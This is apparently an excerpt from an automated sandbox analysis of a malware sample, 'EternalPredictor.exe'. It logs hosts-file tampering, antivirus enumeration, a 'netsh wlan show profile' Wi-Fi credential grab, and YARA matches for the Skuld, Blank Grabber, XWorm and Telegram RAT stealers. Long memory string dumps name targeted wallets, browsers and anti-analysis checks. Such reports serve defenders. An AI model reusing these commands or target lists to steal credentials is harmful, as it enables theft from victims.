                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\XClient.exeQueries volume information: C:\Users\user\AppData\Roaming\XClient.exe VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\consent.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0312~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\XClient.exeQueries volume information: C:\Users\user\AppData\Roaming\XClient.exe VolumeInformation
                        Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 5_2_00007FF72C65D010 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,5_2_00007FF72C65D010
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 5_2_00007FF72C675E7C _get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,5_2_00007FF72C675E7C
                        Source: C:\Users\user\Desktop\EternalPredictor.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                        Lowering of HIPS / PFW / Operating System Security Settings

                        barindex
                        Modifies the hosts file
                        Source: C:\Users\user\AppData\Roaming\program.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Uses netsh to modify the Windows network and firewall settings
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
                        Source: eternal.exe, 00000002.00000002.3240375426.000000001CA00000.00000004.00000020.00020000.00000000.sdmp, eternal.exe, 00000002.00000002.3236463360.000000001BE50000.00000004.00000020.00020000.00000000.sdmp, eternal.exe, 00000002.00000002.3236463360.000000001BEE1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                        Source: C:\Users\user\AppData\Roaming\eternal.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                        Source: C:\Users\user\AppData\Roaming\eternal.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                        Source: C:\Users\user\AppData\Roaming\eternal.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                        Source: C:\Users\user\AppData\Roaming\eternal.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                        Source: C:\Users\user\AppData\Roaming\eternal.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                        Source: C:\Users\user\AppData\Roaming\eternal.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                        Source: C:\Users\user\AppData\Roaming\eternal.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                        Source: C:\Users\user\AppData\Roaming\eternal.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                        Source: C:\Users\user\AppData\Roaming\eternal.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                        Source: C:\Users\user\AppData\Roaming\eternal.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                        Source: C:\Users\user\AppData\Roaming\eternal.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                        Source: C:\Users\user\AppData\Roaming\eternal.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                        Source: C:\Users\user\AppData\Roaming\eternal.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                        Source: C:\Users\user\AppData\Roaming\eternal.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                        Source: C:\Users\user\AppData\Roaming\eternal.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                        Source: C:\Users\user\AppData\Roaming\eternal.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                        Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntivirusProduct

                        Stealing of Sensitive Information

                        barindex
                        Yara detected Blank Grabber
                        Source: Yara matchFile source: 00000008.00000003.1934849918.00000237A5ED6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000003.1524758278.00000139887E3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.1939141033.00000237A49E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000003.1524758278.00000139887E5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.1938588123.00000237A4503000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: program.exe PID: 4464, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: program.exe PID: 2360, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\_MEI44642\rarreg.key, type: DROPPED
                        Yara detected Skuld Stealer
                        Source: Yara matchFile source: 74.0.SecurityHealthSystray.exe.be0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.2.skuld.exe.cf0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 54.0.SecurityHealthSystray.exe.be0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 54.2.SecurityHealthSystray.exe.be0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.0.skuld.exe.cf0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 74.2.SecurityHealthSystray.exe.be0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000036.00000002.1700904810.00000000010B5000.00000002.00000001.01000000.0000001E.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000002.1549558501.00000000011C5000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000000.1505357195.00000000011C5000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000004A.00000000.1680272657.00000000010B5000.00000002.00000001.01000000.0000001E.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000004A.00000002.1701196379.00000000010B5000.00000002.00000001.01000000.0000001E.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000036.00000000.1632827829.00000000010B5000.00000002.00000001.01000000.0000001E.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: skuld.exe PID: 3872, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: SecurityHealthSystray.exe PID: 3948, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Users\user\AppData\Roaming\skuld.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe, type: DROPPED
                        Yara detected Telegram RAT
                        Source: Yara matchFile source: Process Memory Space: program.exe PID: 2360, type: MEMORYSTR
                        Yara detected XWorm
                        Source: Yara matchFile source: 0.2.EternalPredictor.exe.3d22330.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.EternalPredictor.exe.3d10cf0.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 2.0.eternal.exe.bc0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.EternalPredictor.exe.3d22330.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.EternalPredictor.exe.3d10cf0.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000002.00000000.1499082225.0000000000BC2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1521249404.0000000003CF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: EternalPredictor.exe PID: 2852, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: eternal.exe PID: 5604, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Users\user\AppData\Roaming\eternal.exe, type: DROPPED
                        Found many strings related to Crypto-Wallets (likely being stolen)
                        Source: skuld.exe, 00000003.00000002.1549558501.00000000011C5000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: %s profiles/invitesBytecoinEthereumElectrum%s\%s\%sCoinbaseCrocobitMetamaskStarcoinProgramsapp.asarGoStringFullPathno anodeCancelIoReadFileAcceptExWSAIoctlshutdownfile[%d]usernameicon_url%s:%d:%sbad instkernel32hijackedNO_ERRORPRIORITYSETTINGSLocation data=%q incr=%v ping=%qif-matchlocationhttp/1.1HTTP/2.0HTTP/1.1no-cacheContinueAcceptedConflict48828125infinitystrconv.parsing ParseIntcompressEqualSidSetEventIsWindowrecvfromnil PoolscavengepollDesctraceBufdeadlockraceFinipanicnilcgocheckrunnable procid rax rbx rcx rdx rdi rsi rbp rsp r8 r9 r10 r11 r12 r13 r14 r15 rip rflags cs fs gs is not pointer packed=BAD RANK status unknown(trigger= npages= nalloc= nfreed=[signal newval= mcount= bytes, stack=[ minLC= maxpc= stack=[ minutes status= etypes wsaioctlThursdaySaturdayFebruaryNovemberDecember%!Month(ZONEINFOArmenianBalineseBopomofoBugineseCherokeeCyrillicDuployanEthiopicGeorgianGujaratiGurmukhiHiraganaJavaneseKatakanaKayah_LiLinear_ALinear_BMahajaniOl_ChikiPhags_PaTagbanwaTai_ThamTai_VietTifinaghUgariticVithkuqinetedns0[::1]:53continue_gatewayinvalid address readfromunixgram
                        Source: skuld.exe, 00000003.00000002.1549558501.00000000011C5000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: - `` - Jaxx%s%sCoreEverMathNamiTrontruefilereadopensyncpipelinkStatquitbindidle.com.exe.bat.cmdUUIDPOSTtext asn1nullbooljson'\''Host&lt;&gt;http1080DATAPINGEtag0x%xdateetagfromhostvaryDategzip%x
                        Source: skuld.exe, 00000003.00000002.1549558501.00000000011C5000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: pacer: assist ratio=workbuf is not emptybad use of bucket.mpbad use of bucket.bpruntime: double waitpreempt off reason: forcegc: phase errorgopark: bad g statusgo of nil func valueselectgo: bad wakeupsemaRoot rotateRightreflect.makeFuncStubtrace: out of memorywirep: already in gotime: invalid numberJordan Standard TimeArabic Standard TimeIsrael Standard TimeTaipei Standard TimeAzores Standard TimeTurkey Standard TimeEgyptian_HieroglyphsMeroitic_Hieroglyphsinvalid DNS responsegetadaptersaddressesunexpected network: form-data; name="%s"EnterCriticalSectionGetFileAttributesExALeaveCriticalSectionSystemTimeToFileTimeGetSidLengthRequiredenter-recursive-loopnumber has no digitsexpression too largeinvalid repeat count[invalid char class]Bad chunk length: %dbad palette length: invalid image size: unknown PSK identitycertificate requiredgzip: invalid headerheader line too longx509usefallbackrootsmissing IPv6 addressunexpected characterflate: closed writerzlib: invalid headergetCert can't be nilinvalid UTF-8 stringx509: malformed spkiunsupported suite IDinvalid integer typesha3: Sum after ReadSafeArrayDestroyDataSafeArrayGetElemsizemodulus must be >= 0systemexplorerserviceSystemParametersInfoWwin32_VideoController-SubmitSamplesConsentcore.asar not in bodyDiscordTokenProtectordiscordtokenprotectorProtectionPayload.dllintegrity_checkmoduleUbisoft Game LauncherTous les utilisateurs\Exodus\exodus.walletreflect.Value.Complextrace/breakpoint trapuser defined signal 1user defined signal 2link has been severedpackage not installedblock device requiredstate not recoverableread-only file systemstale NFS file handleReadDirectoryChangesWNetGetJoinInformationLookupPrivilegeValueWAdjustTokenPrivilegesexec: already startedunsupported operationinternal error: rc %dsequence tag mismatchafter top-level valuein string escape codekey is not comparableclipboard unavailablenot dib format data: bufio: negative counthttp: nil Request.URLUNKNOWN_FRAME_TYPE_%dframe_ping_has_streamRoundTrip failure: %vUnhandled Setting: %vnet/http: nil Contextunknown address type command not supportedPrecondition RequiredInternal Server ErrorWindows Code Page 858186264514923095703125931322574615478515625GetVolumeInformationWEnableCounterForIoctlCM_Get_DevNode_StatusChangeServiceConfig2WDeregisterEventSourceEnumServicesStatusExWGetNamedSecurityInfoWSetNamedSecurityInfoWDwmGetWindowAttributeDwmSetWindowAttributeNtCreateNamedPipeFileSetupDiEnumDeviceInfoSetupUninstallOEMInfWWSALookupServiceNextWWTSEnumerateSessionsWbad type in compare: of unexported methodunexpected value stepreflect.Value.SetZeroreflect.Value.Pointerreflect.Value.SetUintNetUserGetLocalGroupsGetProfilesDirectoryWnegative shift amountsystem goroutine waitconcurrent map writes/gc/heap/allocs:bytesruntime: work.nwait= previous allocCount=, levelBits[level] = runtime: searchIdx = defer on system stackpanic on system stackasync stack too largestartm: m is spinningstartlockedm: m has pfindrunnable: wrong ppreempt at unknown pcreleasep: inv
                        Source: skuld.exe, 00000003.00000002.1549558501.00000000011C5000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: \Ethereum\keystore%s\extensions-tempreflect.Value.UintGetExitCodeProcesssegmentation faultoperation canceledno child processesconnection refusedRFS specific erroridentifier removedinput/output errormultihop attemptedfile name too longno locks availablestreams pipe errorLookupAccountNameWCreateFileMappingWGetFileAttributesWSetFileAttributesWCommandLineToArgvWunknown _txlock %qnon-minimal lengthtruncated sequencesequence truncatedcannot be negativeexceeded max depthinvalid character in numeric literalcontext.Backgroundunsupported formatbufio: buffer fullhttp: blank cookiereceived from peerFLOW_CONTROL_ERRORframe_goaway_shortproxy-authenticateUNKNOWN_SETTING_%dGo-http-client/2.0Go-http-client/1.1Temporary RedirectPermanent RedirectMethod Not AllowedExpectation Failedbad Content-Lengthfield value for %qIBM Code Page 1047IBM Code Page 1140Macintosh Cyrillicvalue out of range298023223876953125GetPerformanceInfoCM_MapCrToWin32ErrCloseServiceHandleCreateWellKnownSidGetSidSubAuthorityMakeSelfRelativeSDQueryServiceStatusCertGetNameStringWPFXImportCertStoreGetBestInterfaceExClosePseudoConsoleEscapeCommFunctionGetCommModemStatusGetComputerNameExWGetCurrentThreadIdGetModuleFileNameWGetModuleHandleExWGetVolumePathNameWRemoveDllDirectoryTerminateJobObjectWriteProcessMemoryEnumProcessModulesGetModuleBaseNameWreflect.Value.Elemreflect.Value.Typereflect: Zero(nil)adaptivestackstartdontfreezetheworldtraceadvanceperiodtracebackancestorsgarbage collectionsync.RWMutex.RLockGC worker (active)stopping the worldwait until GC endsbad lfnode addresssystem page size (elem align too big but memory size /gc/pauses:seconds because dotdotdotruntime: npages = invalid skip valueruntime: range = {index out of rangeruntime: gp: gp=runtime: getg: g=forEachP: not done in async preempt
                        Source: skuld.exe, 00000003.00000002.1549558501.00000000011C5000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: max=scav ptr ] = (usageinit ms, fault tab= top=[...], fp:MarchApril+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930monthGreekAdlamBamumBatakBuhidDograKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilcpu%dfilesimap2imap3imapspop3shostsrouteparsesse41sse42ssse3SHA-1matchrune NRGBAtls: Earlyutf-8%s*%dtext/bad n (at ClassP-224P-256P-384P-521ECDSAx32dbgvmsrvcprl_ccx96dbgdbgclrde4dotwindbgpc-retx64dbgghidraVMwarevmwarexc64zb8VizSM373836ALIONETVM-PCgeorgeGRAFPCT00917test42XC64ZB5Y3y73serverh86LHDDdQrgcQfofoGlK3zMRPgfV1XIZZuXj8vizsmASPNETS7WjufUser01tHiF2TGjBsjbLouiseGGw8NR3W1GJT-ForceattribNumberembedssqliteChromeChedotKometaFenrirCoowonLiebaoDragonCocCocYandexsecretpaypalbanquewalletcryptoexodusatomiccomptecreditpermisnumberbackupconfigVideosinlinefieldsConfigIntentMeteorImpactPolyMCBypassSystem
                        Source: skuld.exe, 00000003.00000002.1549558501.00000000011C5000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: %s profiles/invitesBytecoinEthereumElectrum%s\%s\%sCoinbaseCrocobitMetamaskStarcoinProgramsapp.asarGoStringFullPathno anodeCancelIoReadFileAcceptExWSAIoctlshutdownfile[%d]usernameicon_url%s:%d:%sbad instkernel32hijackedNO_ERRORPRIORITYSETTINGSLocation data=%q incr=%v ping=%qif-matchlocationhttp/1.1HTTP/2.0HTTP/1.1no-cacheContinueAcceptedConflict48828125infinitystrconv.parsing ParseIntcompressEqualSidSetEventIsWindowrecvfromnil PoolscavengepollDesctraceBufdeadlockraceFinipanicnilcgocheckrunnable procid rax rbx rcx rdx rdi rsi rbp rsp r8 r9 r10 r11 r12 r13 r14 r15 rip rflags cs fs gs is not pointer packed=BAD RANK status unknown(trigger= npages= nalloc= nfreed=[signal newval= mcount= bytes, stack=[ minLC= maxpc= stack=[ minutes status= etypes wsaioctlThursdaySaturdayFebruaryNovemberDecember%!Month(ZONEINFOArmenianBalineseBopomofoBugineseCherokeeCyrillicDuployanEthiopicGeorgianGujaratiGurmukhiHiraganaJavaneseKatakanaKayah_LiLinear_ALinear_BMahajaniOl_ChikiPhags_PaTagbanwaTai_ThamTai_VietTifinaghUgariticVithkuqinetedns0[::1]:53continue_gatewayinvalid address readfromunixgram
                        Source: skuld.exe, 00000003.00000002.1549558501.00000000011C5000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: invalid escape sequenceunsupported certificateno application protocolech accept confirmationCLIENT_TRAFFIC_SECRET_0SERVER_TRAFFIC_SECRET_0QUICEncryptionLevel(%v)varint integer overflowexit hook invoked panicpattern bits too long: too many pointers (>10)segment length too longunpacking Question.Nameunpacking Question.Typeskipping Question Classflate: internal error: invalid PrintableStringx509: malformed UTCTimex509: invalid key usagex509: malformed versionVariantTimeToSystemTimeSafeArrayCreateVectorExP224 point not on curveP256 point not on curveP384 point not on curveP521 point not on curveinvalid scalar encodingGetWindowThreadProcessId-EnableNetworkProtection\Coinomi\Coinomi\walletsfloating point exceptionconnection reset by peerlevel 2 not synchronizedlink number out of rangeout of streams resourcesfunction not implementedstructure needs cleaningnot supported by windowsCertFreeCertificateChainCreateToolhelp32SnapshotGetUserProfileDirectoryWGetProcessImageFileNameWexec: Stdout already setskuld - made by hackirbyjson: unsupported type: RegisterClipboardFormatAinvalid argument to Intnunexpected buffer len=%vinvalid pseudo-header %qframe_headers_prio_shortinvalid request :path %qread_frame_conn_error_%sapplication/octet-streamRequest Entity Too Largehttp: nil 